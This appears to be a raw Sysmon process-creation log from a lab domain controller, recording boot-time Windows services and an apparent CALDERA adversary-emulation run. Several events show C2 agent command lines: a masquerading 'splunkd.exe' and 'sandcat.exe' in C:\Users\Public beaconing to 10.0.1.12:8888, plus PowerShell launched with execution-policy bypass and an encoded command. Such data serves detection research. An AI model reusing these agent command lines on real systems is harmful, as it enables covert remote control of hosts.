154100x80000000000000001634Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:06.566{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" serviceC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x80000000000000001493Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:06.860{A8622C2F-3DFE-6078-3600-00000000AE01}3336C:\Windows\System32\vds.exe10.0.14393.4169 (rs1_release.210107-1130)Virtual Disk ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationvds.exeC:\Windows\System32\vds.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F43B67F8FB870A731294662603690C2F,SHA256=9707255C9778F9A8135BAA4F1A16FAC9EBF2991FD6AF937B232D5FA52D14AC33,IMPHASH=3F541E0A1D775ACA4A7D5FBDFF8433C5{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x80000000000000001484Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:06.817{A8622C2F-3DFE-6078-3500-00000000AE01}3268C:\Windows\System32\vdsldr.exe10.0.14393.4169 (rs1_release.210107-1130)Virtual Disk Service LoaderMicrosoft® Windows® Operating SystemMicrosoft Corporationvdsldr.exeC:\Windows\System32\vdsldr.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B344B812DD6C294360563E52B2EF1C13,SHA256=0A4CA31848D7513F97F72D0292F5BBEE1CA409AAFFCACDE5369E12003B34118D,IMPHASH=D6207B24445355CEA1AC6C8E9A2BA2B9{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x80000000000000001481Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:06.528{A8622C2F-3DFE-6078-2A00-00000000AE01}2500C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe-----"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=44CFD427E8845A455BDE9B7284CD042B,SHA256=EAD9E26AF8996DDC2723D3D393F31D16DBEBDF448702BBBC60BB19831970C7AA,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x80000000000000001478Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:06.746{A8622C2F-3DFE-6078-3400-00000000AE01}3184C:\Windows\System32\wbem\unsecapp.exe10.0.14393.4169 (rs1_release.210107-1130)Sink to receive asynchronous callbacks for WMI client applicationMicrosoft® Windows® Operating SystemMicrosoft Corporationunsecapp.dllC:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=2443CA5962E2134CB389DCD5056D27AE,SHA256=018FF62BCDC292CF9290DB0574C8EF9C97EBC26933C8FC950DD8E6B2B91972FB,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x80000000000000001459Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:06.575{A8622C2F-3DFE-6078-3100-00000000AE01}2212C:\Windows\sysmon64.exe13.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-C:\Windows\sysmon64.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8A914CFB7496B8461285C009DD8F5627,SHA256=422EC998FED690C2EC3239A4BB80075F098A9A95CBDFFBC873365B9F7136A02A,IMPHASH=DCF866F4139DD7FF6C0A5D4FA050CD7A{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x80000000000000001456Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:06.555{A8622C2F-3DFE-6078-2E00-00000000AE01}2864C:\Windows\System32\dfsrs.exe10.0.14393.4169 (rs1_release.210107-1130)Distributed File System ReplicationMicrosoft® Windows® Operating SystemMicrosoft Corporationdfsr.exeC:\Windows\system32\DFSRs.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F2483716D6C752FB448C7295AA3B49A1,SHA256=6B77249159D3C217694B52F0B1C75E0649486EF4A3FE4513CD41D81E7DEB709A,IMPHASH=C1481566D7D03EEC4CC460B52429BA9C{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x80000000000000001453Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:06.577{A8622C2F-3DFE-6078-3300-00000000AE01}2992C:\Windows\System32\dfssvc.exe10.0.14393.4283 (rs1_release.210303-1802)Windows NT Distributed File System ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationdfssvc.exeC:\Windows\system32\dfssvc.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8548C5144E55B79299A0880858A9AF13,SHA256=1EA1D6DB68F92535811D71CA97C2B3A9F9D3409DE8C5FA089658E73B7D3A0689,IMPHASH=D38366C43D0F6223104A675303D8E8CB{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x80000000000000001449Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:06.575{A8622C2F-3DFE-6078-3200-00000000AE01}2480C:\Program Files\Amazon\XenTools\LiteAgent.exe1.0xenagentXENIFACEAmazon Inc.xenagent.exe"C:\Program Files\Amazon\XenTools\LiteAgent.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=3727559C2C2FE26EE668086FAF992815,SHA256=8130E7A850E0A088CB46F2595F7418CE9D73CE2F7750FC017ABC5CF3DED05F06,IMPHASH=C8B18E9A517CB77EA7AB3E7295D84FE8{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x80000000000000001446Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:06.550{A8622C2F-3DFE-6078-2C00-00000000AE01}2876C:\Windows\System32\dns.exe10.0.14393.4283 (rs1_release.210303-1802)Domain Name System (DNS) ServerMicrosoft® Windows® Operating SystemMicrosoft Corporationdns.exeC:\Windows\system32\dns.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8DD15A9DA01C57E0C12E95A5B4A8D242,SHA256=CA8C55567793E0CF2D297E19736F5F5F88430CAB5E3EB9A2160052D39FC9F88D,IMPHASH=F11D7ACAC98040FCC69808598F92C5FA{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x80000000000000001422Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:06.553{A8622C2F-3DFE-6078-2D00-00000000AE01}2856C:\Windows\System32\ismserv.exe10.0.14393.0 (rs1_release.160715-1616)Windows NT Intersite Messaging ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationismserv.exeC:\Windows\System32\ismserv.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=39F0EC2CAE7FF38BABDDE2252ACCEA67,SHA256=29BDF4D2040D24E02B830A272D02CF29F19FD4E1A0F54F22BCC76301A0BFD26F,IMPHASH=088F7CD1DAA87B8E05239EDAB00479BB{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x80000000000000001403Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:06.528{A8622C2F-3DFE-6078-2B00-00000000AE01}2552C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe10.0.14393.4046Microsoft.ActiveDirectory.WebServicesMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.ActiveDirectory.WebServices.exeC:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=868245AE57651C1D8889B528A182C81A,SHA256=2BA73582B4334AEDA469B97D528C24CCB2392FD189524198017D59DF4C4F6504,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x80000000000000001385Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:06.520{A8622C2F-3DFE-6078-2900-00000000AE01}2744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -ExecutionPolicy Bypass -C evkllvC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DF3-6078-2300-00000000AE01}2904C:\Users\Public\splunkd.exe"C:\Users\Public\splunkd.exe" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp 154100x80000000000000001378Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:06.469{A8622C2F-3DFE-6078-2800-00000000AE01}2016C:\Windows\System32\spoolsv.exe10.0.14393.4169 (rs1_release.210107-1130)Spooler SubSystem AppMicrosoft® Windows® Operating SystemMicrosoft Corporationspoolsv.exeC:\Windows\System32\spoolsv.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=87E844BD124333302C9DCF947D98B3A3,SHA256=4C3316B6F7671B2E859B2BC98702C7973FB9BC7A6EA71EDB6ACDFE2CF23EB7A0,IMPHASH=A40033EBEE6E37CE4B1D96B817E1BCC7{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x80000000000000001348Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:59.944{A8622C2F-3DF7-6078-2600-00000000AE01}3024C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k smbsvcsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x80000000000000001334Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:58.217{A8622C2F-3DF6-6078-2500-00000000AE01}2972C:\Users\Public\sandcat.exe-----"C:\Users\Public\sandcat.exe" -server http://10.0.1.12:8888 -group my_group -vC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=4AAC4143487A1888FC416C8D6AAA28BF,SHA256=A98ED4833C64FF96AD74F1A76358B1FB947C7BC61502E51624AFE6944982EC93,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{A8622C2F-3DEE-6078-1A00-00000000AE01}2104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -File C:\caldera_agent.ps1 154100x80000000000000001317Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:55.439{A8622C2F-3DF3-6078-2300-00000000AE01}2904C:\Users\Public\splunkd.exe-----"C:\Users\Public\splunkd.exe" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=32E2535A13E90442893737530C4773D1,SHA256=C4A32E14644C0859C895A66C96AECC9647949F8295EADE40ACE7F3EFC597C6F9,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{A8622C2F-3DEE-6078-1900-00000000AE01}2092C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -File C:\caldera_manx_agent.ps1 154100x8000000000000000996Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:50.398{A8622C2F-3DEE-6078-1200-00000000AE01}1196C:\Windows\System32\dwm.exe10.0.14393.0 (rs1_release.160715-1616)Desktop Window ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationdwm.exe"dwm.exe"C:\Windows\system32\Window Manager\DWM-1{A8622C2F-3DEE-6078-C0C3-000000000000}0xc3c01SystemMD5=C89F159A577F19F7F03C73C98D29D841,SHA256=B3E37997C1C62DD90D69EF83D6A6FC782BF9A5B8AD04A0D1528A8B7FA31AA408,IMPHASH=DDB7DE3741333EE031929A760FCD4542{A8622C2F-3DEB-6078-0900-00000000AE01}780C:\Windows\System32\winlogon.exewinlogon.exe 154100x8000000000000000989Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:50.390{A8622C2F-3DEE-6078-1100-00000000AE01}1164C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\system32\svchost.exe -k LocalServiceC:\Windows\system32\NT AUTHORITY\LOCAL SERVICE{A8622C2F-3DEE-6078-E503-000000000000}0x3e50SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x8000000000000000983Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:50.370{A8622C2F-3DEE-6078-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k termsvcsC:\Windows\system32\NT AUTHORITY\NETWORK SERVICE{A8622C2F-3DEE-6078-E403-000000000000}0x3e40SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x8000000000000000968Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:50.348{A8622C2F-3DEE-6078-0E00-00000000AE01}1080C:\Windows\System32\LogonUI.exe10.0.14393.0 (rs1_release.160715-1616)Windows Logon User Interface HostMicrosoft® Windows® Operating SystemMicrosoft Corporationlogonui.exe"LogonUI.exe" /flags:0x2 /state0:0xa3bef855 /state1:0x41c64e6dC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e71SystemMD5=B38DFCF985D8AE5B1A17C264981E61C7,SHA256=AA62D29803D52EC06CD27ED3124E034048F09606EB7342181913C9817C7B44C5,IMPHASH=A6F3A84D171E55B51A7343E05C8DFAC3{A8622C2F-3DEB-6078-0900-00000000AE01}780C:\Windows\System32\winlogon.exewinlogon.exe 154100x8000000000000000931Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:49.980{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\system32\svchost.exe -k DcomLaunchC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x8000000000000000919Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:48.143{A8622C2F-3DEC-6078-0B00-00000000AE01}840C:\Windows\System32\lsass.exe10.0.14393.2580 (rs1_release_inmarket.181009-1745)Local Security Authority ProcessMicrosoft® Windows® Operating SystemMicrosoft Corporationlsass.exeC:\Windows\system32\lsass.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=5AE8589CDDE46ED132AEF8280BC8894A,SHA256=D957A03C6EA35CBF0C90B0B088DF07E7803A1A3EEB4BA889038F88DB066BBDC4,IMPHASH=0AA67FE637515AC7535797573607EAA2{A8622C2F-3DEB-6078-0700-00000000AE01}696C:\Windows\System32\wininit.exewininit.exe 154100x8000000000000000916Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:48.073{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exe10.0.14393.4169 (rs1_release.210107-1130)Services and Controller appMicrosoft® Windows® Operating SystemMicrosoft Corporationservices.exeC:\Windows\system32\services.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=FEFC26105685C70D7260170489B5B520,SHA256=930F44F9A599937BDB23CF0C7EA4D158991B837D2A0975C15686CDD4198808E8,IMPHASH=A1C9FD59764D67AA201947276212F7CF{A8622C2F-3DEB-6078-0700-00000000AE01}696C:\Windows\System32\wininit.exewininit.exe 154100x8000000000000000914Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:47.940{A8622C2F-3DEB-6078-0900-00000000AE01}780C:\Windows\System32\winlogon.exe10.0.14393.3204 (rs1_release.190830-1500)Windows Logon ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWINLOGON.EXEwinlogon.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e71SystemMD5=DEA4CE12F24601830083126E18A2C7C9,SHA256=F002F8C2EA49D21F242996E3D57F5FDD7995FE6DB524BB69BBD7F190CC0211A9,IMPHASH=3CF10D94C117DB4F6E9D523B93429D6D{A8622C2F-3DEB-6078-0600-00000000AE01}688C:\Windows\System32\smss.exe- 154100x8000000000000000909Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:47.866{A8622C2F-3DEB-6078-0700-00000000AE01}696C:\Windows\System32\wininit.exe10.0.14393.2273 (rs1_release_1.180427-1811)Windows Start-Up ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWinInit.exewininit.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=5A998F811D7805B79B8E769027F62FD2,SHA256=8694C5732D26921EEA29589A9FA4182139EF3D9EA6B6D0ACCA8994B4AA5DEFE5,IMPHASH=C8D526C4E61942E1B11AE4B7EE2DDE5D{A8622C2F-3DEB-6078-0400-00000000AE01}616C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000bc 0000007c 154100x8000000000000000907Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:47.868{A8622C2F-3DEB-6078-0800-00000000AE01}704C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e71SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{A8622C2F-3DEB-6078-0600-00000000AE01}688C:\Windows\System32\smss.exe- 154100x8000000000000000904Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:47.863{A8622C2F-3DEB-6078-0600-00000000AE01}688C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000000d8 0000007c C:\Windows\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e71SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{A8622C2F-3DE9-6078-0200-00000000AE01}432C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 154100x8000000000000000896Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:47.727{A8622C2F-3DEB-6078-0500-00000000AE01}624C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{A8622C2F-3DEB-6078-0400-00000000AE01}616C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000bc 0000007c 154100x8000000000000000893Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:47.598{A8622C2F-3DEB-6078-0400-00000000AE01}616C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000000bc 0000007c C:\Windows\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{A8622C2F-3DE9-6078-0200-00000000AE01}432C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 154100x8000000000000000890Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:45.845{A8622C2F-3DE9-6078-0300-00000000AE01}572C:\Windows\System32\autochk.exe10.0.14393.4283 (rs1_release.210303-1802)Auto Check UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationAutoChk.Exe\??\C:\Windows\system32\autochk.exe /q /v *C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=A782E5C76170546278F1654332F3DA46,SHA256=CCA83B3DDE1DACFB121299E9468D52D57582E805F273234166F5EB001543AC31,IMPHASH=1BF5E4792E849FE3BCFE23E7C1B21A3F{A8622C2F-3DE9-6078-0200-00000000AE01}432C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 04/15/2021 01:21:15 PM LogName=System SourceName=Microsoft-Windows-Kernel-General EventCode=1 EventType=4 Type=Information ComputerName=win-dc-281.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-19 SidType=0 TaskCategory=5 OpCode=Info RecordNumber=89557 Keywords=Time Message=The system time has changed to ‎2021‎-‎04‎-‎15T13:21:15.146000000Z from ‎2021‎-‎04‎-‎15T13:21:15.147122400Z. Change Reason: An application or system component changed the time. 154100x8000000000000000764Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:14.285{A8622C2F-3DCA-6078-E702-00000000AD01}3892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DCA-6078-60AF-100000000000}0x10af600HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DCA-6078-E602-00000000AD01}4548C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 154100x8000000000000000751Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:14.280{A8622C2F-3DCA-6078-E602-00000000AD01}4548C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DCA-6078-60AF-100000000000}0x10af600HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DCA-6078-E402-00000000AD01}4420C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 154100x8000000000000000732Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:14.210{A8622C2F-3DCA-6078-E402-00000000AD01}4420C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe 